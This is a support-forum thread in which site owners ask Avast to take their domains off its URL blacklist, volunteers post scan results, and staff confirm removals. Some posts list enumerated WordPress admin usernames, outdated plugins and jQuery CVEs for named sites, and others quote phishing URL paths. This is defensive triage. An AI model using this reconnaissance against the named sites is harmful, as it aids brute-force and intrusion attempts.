login.hma.ecvi[.]ru/login removed from our blacklist, shouldn't happen again. Time blocked today ~55 minutes.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on July 19, 2018, 03:52:21 PM
The same problem
Same as what?

If blocked website ... what website?

Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on July 19, 2018, 04:04:46 PM
The same problem
Same as what?

If blocked website ... what website?
Some folks think we are actually mind readers. :)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 19, 2018, 04:37:29 PM
Hi bob3160,

Thanks for your reaction, my friend. Quite agree, we cannot do magic without knowing what to call up.  ;D  8)

Quite the same problem should not be posted, as that has already came unblocked now.
So the right or more appropriate term would be "a rather similar" problem.

Anything of a broken link like [hxtp://www dot site-with-similar-problem dot com] would be welcome to tackle the problem.

And my "mind reading crystal ball of experience" is only working through code (mostly JavaScript, HTML, like jQuery, json etc.)
(good code, suspicious code, malcode, vulnerable code, retirable code, any code for that matter, etc.). ;)

The final verdict will then always be given by an avast team member, as they are the ones that can come and unblock.
We here are just volunteers with relative knowledge and give you recommendations as how to make your site more secure.

Have a nice day,

polonus
Title: Re: How to remove my website from your blacklist?
Post by: JL20 on October 16, 2018, 03:16:11 PM
Hi !

I lauched the website my-dcl [.] com, that has a simple react app running, with no form or whatsoever,

It has been detected as a phishing threat and is blocked without error thrown in browsers ?

Could you please help me to be out of the blacklist asap as communication is starting around the launch of this website ?

Also I would like to know what created the false positive in order to make any correction if needeed

Thanks
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on October 16, 2018, 03:23:58 PM
Use the following to report your site:

Report a URL
https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 16, 2018, 06:07:12 PM
Blocked according to IP here: https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_proxies.netset
8 security hints for website: https://webhint.io/scanner/401648de-a0b0-4dac-8557-2a1ec5a60679
error
Quote
-my-dcl.com/static/js/main.96968a47.js
     status: (referer=XXX/web?q=puppies)saved 339437 bytes 22310c96195c3538a9a1daceacb1a580c718ce7e
     info: [decodingLevel=0] found JavaScript
     error: undefined function Object.defineProperty
     error: undefined function console.error
     error: line:5: TypeError: invalid 'in' operand Br

polonus
Title: Re: How to remove my website from your blacklist?
Post by: JL20 on October 17, 2018, 02:41:32 AM
Thank you Polonus !
Title: Re: How to remove my website from your blacklist?
Post by: Yakov7 on October 23, 2018, 08:19:07 AM
Hello.
https://tenders.procurement.gov.ge/

Today is started to be blocked by Avast. Mal:Phishing

We have checked this site almost in all databases and found no issues.
This is Georgian government procurement site.
Please remove from your database
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on October 23, 2018, 08:30:07 AM
You can report a suspected FP (File/Website) here: https://www.avast.com/false-positive-file-form.php
Title: Re: How to remove my website from your blacklist?
Post by: Yakov7 on October 23, 2018, 08:31:19 AM
Thanks a lot
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on October 23, 2018, 08:32:06 AM
You're welcome.
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on January 15, 2019, 09:38:17 PM
My website https://lafamilledabord.fr/ (https://lafamilledabord.fr/) is blocked by the last version of avast.
The form i found is not meant to be used for complains anymore.
What shall IU do ?
Thanks in advance.
https://forum.avast.com/index.php?topic=127517.msg1480845#msg1480845
Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 15, 2019, 10:28:53 PM
Website had been reported for PHISHING.
Reputation Check
PASSED
Google Safe Browse: OK
Spamhaus Check: OK
Compromised Hosts: OK
Dshield Blocklist: OK
Shadowserver C&C: OK
Web Server:
Apache
X-Powered-By:
None
IP Address:
185.22.109.166
Hosting Provider:
PlanetHoster 
Shared Hosting:

Wait for an avast team member to react, as they are the only ones to come and unblock.
Also report to McAfee's as the website has been blocked from there as well.

A mere two security related recommendations: https://webhint.io/scanner/c17d81e6-48a4-49ae-9d76-e8b661130dd3#Security

10 security glitches here: https://webscan.upguard.com/#/https://lafamilledabord.fr/wp-content/

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 16, 2019, 02:04:55 PM
Hi clement34,

They are known to react often within the launch of a new definition update.
Just have some patience for things will work out,

polonus
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on January 17, 2019, 10:59:08 AM
Hi,
This was unblocked an hour ago (and was blocked because of "lafamilledabord[.]fr/paypal[.]php").
Title: Re: How to remove my website from your blacklist?
Post by: Ijaz Ahmad on January 21, 2019, 07:33:33 PM
Sir my website hxxps://www[.]crdo[.]org[.]pk is blocked by avast showing it a phishing url,
while i had checked my site on several scanning websites and my url is not listed anywhere.

Could you help to remove my website hxxps://www[.]crdo[.]org[.]pk from your blocklisted url on avast ?? as it is creating issues for me.
your help will be appreciated please.
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on January 21, 2019, 07:49:43 PM
Sir my website https://www.crdo.org.pk (https://www.crdo.org.pk) is blocked by avast showing it a phishing url,
while i had checked my site on several scanning websites and my url is not listed anywhere.

Could you help to remove my website https://www.crdo.org.pk (https://www.crdo.org.pk) from your blocklisted url on avast ?? as it is creating issues for me.
your help will be appreciated please.
https://www.virustotal.com/en/url/632ee3450a579b197253a1e690c039d10e9273d59d2f03112a7c7352120ac7e0/analysis/1548096267/ (https://www.virustotal.com/en/url/632ee3450a579b197253a1e690c039d10e9273d59d2f03112a7c7352120ac7e0/analysis/1548096267/)
0/66 Detection Ration.
Probably a false positive
You can report it here, https://www.avast.com/false-positive-file-form.php (https://www.avast.com/false-positive-file-form.php)

Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 21, 2019, 10:31:37 PM
Submitted to PHISHcheck I get:
Quote
{"sid": 170866, "is_success": true}
.
Also suspicious *.pk domain alerted.
But wait for an avast team member to give the final verdict.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on January 28, 2019, 10:31:59 AM
Hi,
hxxps://www[.]crdo[.]org[.]pk was removed from our blacklist on 23. 1.
Title: Re: How to remove my website from your blacklist?
Post by: Kuba37 on January 30, 2019, 09:21:33 PM
Hi,

Could you help us remove our shop website: hxxps://berriesandco[.]pl/  from your blocklisted url on avast? Your help will be greatly appreciated.

Many thanks,
Team Berries&Co.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on January 30, 2019, 09:25:06 PM


Report a false positive (select file or website)
https://www.avast.com/false-positive-file-form.php


Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on January 31, 2019, 10:21:15 AM
Hi, the domain is blocked due to berriesandco[.]pl/core/wp/ameliass/portailas/appmanager/portailas/amelipro containing (probably fake) form in French (!) that requests credit card number, cvv code and expiration date.
Title: Re: How to remove my website from your blacklist?
Post by: SCompartir on February 22, 2019, 08:53:40 AM
Hello,

We need your help to review one of our sites.
Some users are receiving Avast phishing alerts on the following page: hxxp://lms30.santillanacompartir[.]com/

I checked the link and it looks clean:
https://www.virustotal.com/#/url/4ed49a96f5b774bb096c7adfb0f2fe88c3abb0660c18cc77ee5ed58f264bb69e/detection
https://www.urlvoid.com/scan/lms30.santillanacompartir.com/

Can you please remove it from the list?
thanks in advance
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on February 22, 2019, 09:16:51 AM
You can report a suspected FP (File/Website) here: https://www.avast.com/false-positive-file-form.php
Title: Re: How to remove my website from your blacklist?
Post by: SCompartir on February 22, 2019, 09:45:13 AM
Thanks Asyn.

We reported it yesterday but we still have no solution. It is an important issue that is causing problems in the schools that use our software.
Any help is very much appreciated
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 24, 2019, 08:15:15 PM
I see only this as content
Quote
Content that was returned by your request for the URL: hxtp://lms30.santillanacompartir.com/

1:  < !DOCTYPE>
2:  < html>
3:  < head>
4:  < title> EB EV-SAN ALB< /title>
5:  < /head>
6:  < body>
7:  < p> .INF-EV-SAN-LMS-APP.< /p>
8:  < /body>
9:  < /html>

Also consider: http://ikeyword.net/lms.santillanacompartir.com

IP block, probably because of this report: https://www.threatcrowd.org/domain.php?domain=-ecf.d41 dot co

Wait for a final verdict from an avast team member, as we here are just volunteers with relative knowledge
and only avast team members can come and unblock,

polonus (volunteer website security analyst and website error-hunter)


Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on February 25, 2019, 11:16:34 AM
Hi,
I have removed the detection on lms30.santillanacompartir[.]com/student/document.
Title: Re: How to remove my website from your blacklist?
Post by: SCompartir on February 25, 2019, 12:32:00 PM
Hi,
I have removed the detection on lms30.santillanacompartir[.]com/student/document.

Thanks HonzaZ we`re going to check it ASAP.
Title: Re: How to remove my website from your blacklist?
Post by: alexb2 on March 20, 2019, 04:58:38 PM
Hello,

It seems that our clients website it's been blacklisted: https://nyleadpaintexperts[.]com
Can you have a look, please?
Here are the reports from UrlVoid and VirusTotal:

https://www.urlvoid.com/scan/nyleadpaintexperts.com/
https://www.virustotal.com/gui/url/e7f706b3c0b39495c14d737d382224d2a2293d85451b67056f37cb761ccd4759/detection

Thank you,
Alex
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 21, 2019, 07:40:22 AM
Hi,
I have removed nyleadpaintexperts[.]com from our blacklist.
Honza
Title: Re: How to remove my website from your blacklist?
Post by: support-fr on March 25, 2019, 11:52:12 AM
Hi all,

can you check on your system why our website URL (na2se.voxco.com) is blacklisted please ?
We are an international online survey company and we're interviewing many people by using this website from email invitation

NB : I've checked many sites to see if our URL is clean, and this is the way, all lights are green

Thank you in advance for your help

Best Regards
Sebastien
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 25, 2019, 12:04:31 PM
Hi,
na2se.voxco[.]com was removed from our blacklist an hour ago.
Title: Re: How to remove my website from your blacklist?
Post by: isp on March 25, 2019, 12:43:35 PM
Hi , we have cleaned fadq.org

Can you please unblock?

Cheers,
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 25, 2019, 12:53:37 PM
nice to hear that, I have removed fadq[.]org from our blacklist.
Title: Re: How to remove my website from your blacklist?
Post by: cengiztaskin0 on March 27, 2019, 01:49:32 PM
Hi,

I get phissing error for my website https://www.teknolojionline.net when avast is on. I check with urlvoid and virustotal but looks clean. Can you check please
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on March 27, 2019, 01:57:10 PM
-> https://sitecheck.sucuri.net/results/https/www.teknolojionline.net
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 27, 2019, 02:14:03 PM
Site now responds with a 500 Server error.
See: https://urlquery.net/report/2b77c249-3ab2-475c-a766-86f451c0060a

Wait for a final verdict of an avast team member, as they are the only ones to eventually unblock.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 28, 2019, 09:35:05 AM
We blocked the whole domain because we noticed phishing here: teknolojionline[.]net/update/account/zrzpdaynfe4n7xm1u734bmzq.php?wa=wsignin1.0&rpsnv=13&ct=1790861588&rver=a237a9dbd66258836a26716120f2c8f6&wp=mbi_ssl_shared&wreply=inbox&lc=1024&id=a237a9dbd66258836a26716120f2c8f6&mkt=en-us&cbcxt=mai&email=
Title: Re: How to remove my website from your blacklist?
Post by: perkins on March 28, 2019, 11:09:23 AM
Hi,

Avast pops up reporting that my website www.backcouture[.]com is supposedly infected. According to Mcafee and Sucuri's sitecheck, the website is clean.

Please check it, regards
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on March 28, 2019, 11:43:54 AM
Hi,
backcouture[.]com was removed from our blacklist a week ago.
Title: Re: How to remove my website from your blacklist?
Post by: cengiztaskin0 on March 28, 2019, 12:22:47 PM
We blocked the whole domain because we noticed phishing here: teknolojionline[.]net/update/account/zrzpdaynfe4n7xm1u734bmzq.php?wa=wsignin1.0&rpsnv=13&ct=1790861588&rver=a237a9dbd66258836a26716120f2c8f6&wp=mbi_ssl_shared&wreply=inbox&lc=1024&id=a237a9dbd66258836a26716120f2c8f6&mkt=en-us&cbcxt=mai&email=

We delete whole directory and move our site to another hosting without transfering any data. The link youo provide is giving 404 now. Can you tell me please Is there anything I can do for removal?
Title: Re: How to remove my website from your blacklist?
Post by: LukasJ on March 28, 2019, 08:29:51 PM
We blocked the whole domain because we noticed phishing here: teknolojionline[.]net/update/account/zrzpdaynfe4n7xm1u734bmzq.php?wa=wsignin1.0&rpsnv=13&ct=1790861588&rver=a237a9dbd66258836a26716120f2c8f6&wp=mbi_ssl_shared&wreply=inbox&lc=1024&id=a237a9dbd66258836a26716120f2c8f6&mkt=en-us&cbcxt=mai&email=

We delete whole directory and move our site to another hosting without transfering any data. The link youo provide is giving 404 now. Can you tell me please Is there anything I can do for removal?

Hi, I checked the site and removed it from blacklist.

Regards
Lukas
Title: Re: How to remove my website from your blacklist?
Post by: code4webs on April 03, 2019, 08:14:56 PM
Hello avast support,
my website also i see blacklisted by
Domain blacklisted by McAfee: www.benetofoods[.]com
so how you can make it whiltelisted and safe
thanks in advance.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 03, 2019, 11:07:02 PM
4 engines detect: https://www.virustotal.com/#/url/b4cf7c9ef7e7069b106a4f3b7006c100c794974f28607cb162b2ac685edf0f44/detection
Threats to the website: https://webscan.upguard.com/#/www.benetofoods.com
Re:
Quote
  Content after the < /html> tag should be considered suspicious.
< !-- WP Fastest Cache file was created in 0.2729640007019 seconds, on 03-04-19 22:56:37 --> < !-- need to refresh to see cached version -->
-> https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3LmJ7bnt0XWZdXSNzLl5dbQ%3D%3D~enc
Blacklisted: https://sitecheck.sucuri.net/results/www.benetofoods.com
Plug-in update required:    weglot 2.5.0   latest release (2.7.0) Update required
http://wordpress.org/plugins/weglot/

Disable please -> User Enumeration
  The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   None   benetofoods
2   None   stuff
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

263 recommendations to improve your website: https://webhint.io/scanner/58bf5295-0359-4b65-ae73-62c33326d1df

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on April 03, 2019, 11:46:27 PM
@ code4webs,
Please make the link unselectable. We don't need live links to possible dangerous sites. Thanks
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on April 04, 2019, 09:19:09 AM
Domain blacklisted by McAfee: www.benetofoods[.]com
so how you can make it whiltelisted and safe
Contact McAfee :)
Title: Re: How to remove my website from your blacklist?
Post by: Alberto217 on April 04, 2019, 11:25:23 AM
I need unblock the site www.aspanri.org, can help me?, thanks
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on April 04, 2019, 11:35:23 AM
I need unblock the site www.aspanri.org, can help me?, thanks
Report a false positive (select file or website)
https://www.avast.com/false-positive-file-form.php
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 04, 2019, 01:25:11 PM
Hi Pondus,

Checked at VT, not untill this is being removed. Good detection? See:
https://www.virustotal.com/#/file/9fd6e3fa2084b4f30b734144765e6a1453fd4dde5425688e37cfac92dbde6a52/detection
avast detects as PDF:UrlMal-inf [Trj] or this must be a false positive?

pol
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on April 10, 2019, 12:36:12 AM
I need unblock the site www[.]aspanri[.]org, can help me?, thanks

Detection was removed on 09.04.2019 at 11:27 AM

Quote from: Avast
Our virus specialists have now cleared its reputation in our database.

With URLs this change should be instant, but it might take up to 24 hours with files.
Title: Re: How to remove my website from your blacklist?
Post by: Ashutosh9 on April 24, 2019, 08:49:28 AM
Avast aborting connection on http://shardatech[.]org and showing resong as URL:Phising.
Please help me out
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on April 24, 2019, 09:04:35 AM
I have removed shardatech[.]org from our blacklist ;-)
Title: Re: How to remove my website from your blacklist?
Post by: Jared67 on April 27, 2019, 11:57:47 PM
Hello - Can you please check laportecountyhistory[.]org and remove from your blacklist? The site has been rebuilt an is on a different hosting environment, malware free :-) Thank you in advance!
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 28, 2019, 12:35:36 AM
Hi Jared67,

See the history of what was flagged on your website here:
https://www.virustotal.com/#/domain/laportecountyhistory.org
Latest detection of recebt PHISHING here: https://www.virustotal.com/#/url/4796f5d1a5801dae440e5202922df03561b679e71154183a792e1a2d12e3d3bd/detection

See: https://www.virustotal.com/#/file/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/community

Site is blacklisted: https://sitecheck.sucuri.net/results/https/laportecountyhistory.org

Update a.s.a.p: The following plugins were detected by reading the HTML source of the WordPress sites front page.

Ultimate_VC_Addons   
woo-gutenberg-products-block 1.4.0   latest release (2.0.1)
https://github.com/woocommerce/woocommerce-gutenberg-products-block
woocommerce 3.5.7   latest release (3.6.2)
https://woocommerce.com/
mpc-massive   
revslider   
global-gallery   
js_composer   
Plugins are a source of many security vulnerabilities within WordPress installations, always keep them updated to the latest version available and check the developers plugin page for information about security related updates and fixes.

DOM-XSS issues: Results from scanning URL: -https://laportecountyhistory.org
Number of sources found: 14 ; number of sinks found: 129
&
Results from scanning URL: -https://laportecountyhistory.org/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.1
Number of sources found: 41 ; number of sinks found: 17

Wait for an avast team member for a final verdict on your website, we here are just volunteers with relevant knowledge,
but cannot come and unblock.

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: EllieW on April 28, 2019, 06:53:16 AM
Please remove quitsmokingalbany.com from your blacklist - site was cleaned - moved to new host - taken off all blacklists but yours - sucuri sitecheck shows it is clean.

Thank You
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on April 28, 2019, 06:59:40 AM
-> https://www.virustotal.com/#/url/94bf31f038a9868e920e341511329b34bc4d3dada5a3f7ef90ad9c5016f319a0/detection
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 28, 2019, 01:29:07 PM
Hi EllieW,

Detection probably because IP is mentioned in PHISHING- and spam-reports, like:
https://checkphish.ai/ip/96.9.220.170
&
https://cleantalk.org/blacklists/96.9.220.167

See: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=cXVbdHNtXWtbbmd8bGJ8bnkuXl1t~enc
Nothing new when you share your address on this IP with 1664 other sites found on 96.9.220.170.

Site comes Google OK-ed, so wait for an avast team member to give the final verdict,
as they are the only ones to come and unblock.

Recommendations to come to a more secure site are given here: https://sitecheck.sucuri.net/results/quitsmokingalbany.com
and also here: https://webhint.io/scanner/64355e00-0ac8-40ef-91cd-fe94145fbe46 (140 hints in all).

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)

P.S.  Off-topic - I gave up on smoking some 30 years ago. Keep up the good work  ;)

polonus
Title: Re: How to remove my website from your blacklist?
Post by: savcin on April 29, 2019, 12:24:20 PM
Fixed
Title: Re: How to remove my website from your blacklist?
Post by: mariustgv2004 on May 02, 2019, 05:59:03 PM
Can you please remove djstneamt.ro and all the related urls from your blacklist? I reinstalled the platform and it's clean now. Also, I've changed the hosting. Thank you.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on May 02, 2019, 06:03:34 PM
Report a false positive (select file or website)
https://www.avast.com/false-positive-file-form.php


Something you can fix
https://retire.insecurity.today/#!/scan/64e902de89a3864e75e6233fa5cd4a2f359eae312d56004f72260034538b3dda


Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 02, 2019, 06:51:46 PM
Various server misconfigurations: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=I2pzdG57fG10Ln1dYF5nWy1zeXNgI3tmfHVsdHd7YnB8Z3suXmdb~enc
not secure...

Pondus could have given you these results, where 2 flag as website PHISHING (fortinet's)  and as malicious (SOPHOS):
https://www.virustotal.com/en/url/eae3566e6281aec2e1a75b469b842d16768df120e5f8e7175777d225c03aa785/analysis/1556815452/

Site blacklisted: https://sitecheck.sucuri.net/results/djstneamt.ro  Quttera gives it as clean.

Wait for a final verdict from an avast team member, as they are the only ones to come and unblock.

See: https://www.shodan.io/host/185.195.18.227

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on May 03, 2019, 03:27:08 AM
Detection has been removed  02.05.2019 laportecountyhistory.org and djstneamt.ro is no longer blocked. 

Quote from: Avast
Our virus specialists have been working on this problem and it has now been resolved. The provided website isn't detected by Avast anymore.
Title: Re: How to remove my website from your blacklist?
Post by: kexag31 on May 14, 2019, 05:40:00 PM
my site https://subz.xyz is blocked by avast.
Can you please check and remove the block?

Thanks,
kexag31

https://prnt.sc/nohsyh
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 15, 2019, 10:25:30 AM
2 to flag: https://www.virustotal.com/#/domain/subz.xyz   subject abuse elevated exposure...
Security Checks for subz.xyz
(4) Domain at risk of being hijacked
Vulnerabilities can be uncovered more easily
(5) Susceptible to man-in-the-middle attacks
DNS is susceptible to man-in-the-middle attacks  source: upguard..

See: https://www.virustotal.com/#/url/6609e4c740eb57ca2d091b212978d902f10f9b8734498715e937fc48360d3a8a/detection
malware in this script min.js: https://www.virustotal.com/#/url/bb34986e109d1de6044fa1df2cdd1d1b8292a4802f3c020612778c2846f3b7e1/detection

Wait for an avast team member to give a final verdict, you are no victim to form-jacking...

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on May 16, 2019, 01:13:05 PM
my site htxps://subz[.]xyz is blocked by avast.
Can you please check and remove the block?

Thanks,
kexag31

https://prnt.sc/nohsyh

Detection was removed yesterday.

Quote from: Avast
Our virus specialists have been working on this problem and it has now been resolved. The provided website isn't detected by Avast anymore.
Title: Re: How to remove my website from your blacklist?
Post by: Bahadir7 on May 17, 2019, 03:46:11 PM
hello. http://www.lorawedding.com blocked.

virustotal : https://www.virustotal.com/gui/url/3108ee7132fad40925d7f282cdab80db63fa55badd372db96f1368642c3c29c6/detection

http://www.lorawedding.com - all clean

------

https://www.lorawedding.com
CLEAN MX : Malicious

they dont responds my email.

can you remove site from your blacklist
Title: Re: How to remove my website from your blacklist?
Post by: mchain on May 18, 2019, 06:47:43 AM
https://quttera.com/detailed_report/www.lorawedding.com (https://quttera.com/detailed_report/www.lorawedding.com)
Title: Re: How to remove my website from your blacklist?
Post by: Bahadir7 on May 18, 2019, 09:15:24 AM
mchain thank you for your help.

i fixed quttera.

https://quttera.com/detailed_report/www.lorawedding.com
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 19, 2019, 01:45:37 PM
Still see a blacklist url detection warning from avast,

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on May 22, 2019, 02:33:12 AM
hello. hxxp://www.lorawedding[.]com blocked.

virustotal : https://www.virustotal.com/gui/url/3108ee7132fad40925d7f282cdab80db63fa55badd372db96f1368642c3c29c6/detection

hxxp://www.lorawedding[.]com - all clean

------

hxxps://www.lorawedding[.]com
CLEAN MX : Malicious

they dont responds my email.

can you remove site from your blacklist

Detection was removed 21.05.2019

Quote from: Avast
Our virus specialists have been working on this problem and it has now been resolved. The provided URL is not detected by Avast anymore.
Title: Re: How to remove my website from your blacklist?
Post by: team7 on May 24, 2019, 08:59:21 PM
Can you check our site. Is blacklisted by Avast. www.pinpointlv.com
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 24, 2019, 10:02:10 PM
Is this meant to be there The location line in the header above has redirected the request to: -https://pinpointlv.com/

( If this redirect is not what you expected SEE: Redirects. for some tips on clearing redirects.)


Via: -http/1.1 a2nlwpproxy015.prod.iad2.secureserver.net (ApacheTrafficServer/7.1.2 [uSc s f p eN:tOc i p sS])
Server: ATS/7.1.2

Three detect: https://www.virustotal.com/#/url/f32fd8910e1f8e3bac4211e4047606abdd5d0284623a5fdc91a0e40bc683dfe4/detection
Blacklisted: https://urlquery.net/report/a08383f3-71b7-4adf-afe1-9f5e98d9e8ed  probably IP related..


Here site is given OK: https://sitecheck.sucuri.net/results/https/www.pinpointlv.com

Word Press version - Version does not appear to be latest

Webshield detects phishing, wait for a final verdict from an avast team member,
on google analytics I get failed to load resource: the server responded with a status of 404 () Golfe2

polonus












Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on May 29, 2019, 03:13:27 AM
Can you check our site. Is blacklisted by Avast. wxw.pinpointlv[.]com

Detection was removed 28.05.2019

Quote from: Avast
Our virus specialists have been working on this problem and it has now been resolved. The provided URL is not detected by Avast anymore.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 29, 2019, 05:25:01 PM
Retirable jQuery library detected here:
Retire.js
jquery   1.12.4   Found in -https://pinpointlv.com/wp-content/cache/busting/1/wp-includes/js/jquery/jquery-1.12.4.js
Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   

DOM-XSS sinks & sources: Results from scanning URL: -https://pinpointlv.com
Number of sources found: 1
Number of sinks found: 121

Results from scanning URL: -https://pinpointlv.com/wp-content/cache/busting/1/wp-includes/js/jquery/jquery-1.12.4.js
Number of sources found: 41
Number of sinks found: 17

Results from scanning URL: -https://pinpointlv.com/wp-content/cache/busting/1/wp-includes/js/jquery/jquery-1.12.4.js
Number of sources found: 188
Number of sinks found: 97

polonus
Title: Re: How to remove my website from your blacklist?
Post by: belykhalexander on May 31, 2019, 11:13:45 AM
Hello,

Our website http://www.brightelec.ru/ is reported as being in the avast blacklist.
The site seems to be clean. Could you please check?

Best regards,
Alexander
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on May 31, 2019, 11:21:03 AM
-> https://sitecheck.sucuri.net/results/www.brightelec.ru
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 01, 2019, 07:02:52 PM
IP related detection: https://www.abuseipdb.com/check/185.165.123.206 (800 sites share this IP address!).
E-grade results: https://securityheaders.com/?q=www.brightelec.ru&hide=on&followRedirects=on
207 improvement hints:  https://webhint.io/scanner/985b7b86-bc97-4d5d-817d-f03e9b8cbe08
security related: https://webhint.io/scanner/985b7b86-bc97-4d5d-817d-f03e9b8cbe08#category-Security
consider: https://www.virustotal.com/gui/domain/www.brightelec.ru/details

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on June 03, 2019, 01:03:09 PM
Hello,

Our website hxxp://www.brightelec[.]ru/ is reported as being in the avast blacklist.
The site seems to be clean. Could you please check?

Best regards,
Alexander

Detection was removed 03.06.2019 at 07:54 a.m.

Quote from: Avast
Our virus specialists have now cleared its reputation in our database.

With URLs this change should be instant, but it might take up to 24 hours with files.
Title: Re: How to remove my website from your blacklist?
Post by: mjo_stluke on June 05, 2019, 11:01:37 PM
Our website stlukesavl.org is currently blocked. The site is hosted by aplus.net/deluxe checks. You have their control panel domain blacklisted as well. myutilitydomain.com. This causes suspicious script problems/blacklist.

I have run sitecheck and virus total on stlukesavl.org and we are clean. myutilitydomain and our related subdomain to access our control panel should be de-blacklisted. The entire domain name and control panel access of a major hosting company should not be blacklisted. 

Please Help.

Thanks,
Mark
Title: Re: How to remove my website from your blacklist?
Post by: DavidR on June 06, 2019, 01:22:49 AM
@  mjo_stluke
Have you reported it ?
Report Avast False Positive File or Website - please use the https://www.avast.com/false-positive-file-form.php (https://www.avast.com/false-positive-file-form.php).
Title: Re: How to remove my website from your blacklist?
Post by: mjo_stluke on June 06, 2019, 01:35:54 AM
Thanks for the link. I have reported it now.

-Mark
Title: Re: How to remove my website from your blacklist?
Post by: DavidR on June 06, 2019, 02:42:19 AM
Thanks for the link. I have reported it now.

-Mark

You're welcome. 

That should get to the virus labs team, were it may take a little time for one of the team to see it here.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 06, 2019, 06:23:56 PM
Probably the detection is because of the IP you share on a bad host,
see: https://ransomwaretracker.abuse.ch/ip/64.29.151.221/
&  https://www.abuseipdb.com/check/64.29.151.221
Re: https://www.threatminer.org/host.php?q=64.29.151.221
and https://www.projecthoneypot.org/ip_64.29.151.221
11 threats in this report: https://app.upguard.com/#/http://stlukesavl.org
Given tha all green here: https://sitecheck.sucuri.net/results/stlukesavl.org
mind the TLS recommendations...

On CMS: WordPress Version
4.9.10
Version does not appear to be latest . Update now!

 User Enumeration
  The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   luke_admin   luke_admin
2   Patty Mouer   patty
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

This scan failed: https://sitecheck.sucuri.net/results/qxxa9kl8.myutilitydomain.com/xmlrpc.php
Not secure, avast flags: -http://qxxa9kl8.myutilitydomain.com/xmlrpc.php

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: furkaan23 on June 18, 2019, 10:42:05 PM
This site https://azra.com.tr seems to have been blacklisted by avast. How to fix this?
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on June 18, 2019, 11:04:31 PM
This site https://azra.com.tr seems to have been blacklisted by avast. How to fix this?

Report a false positive (select file or website)
https://www.avast.com/false-positive-file-form.php

https://forum.avast.com/index.php?topic=14433.msg1289438#msg1289438



Title: Re: How to remove my website from your blacklist?
Post by: furkaan23 on June 19, 2019, 11:38:49 AM
This site https://azra.com.tr seems to have been blacklisted by avast. How to fix this?

Report a false positive (select file or website)
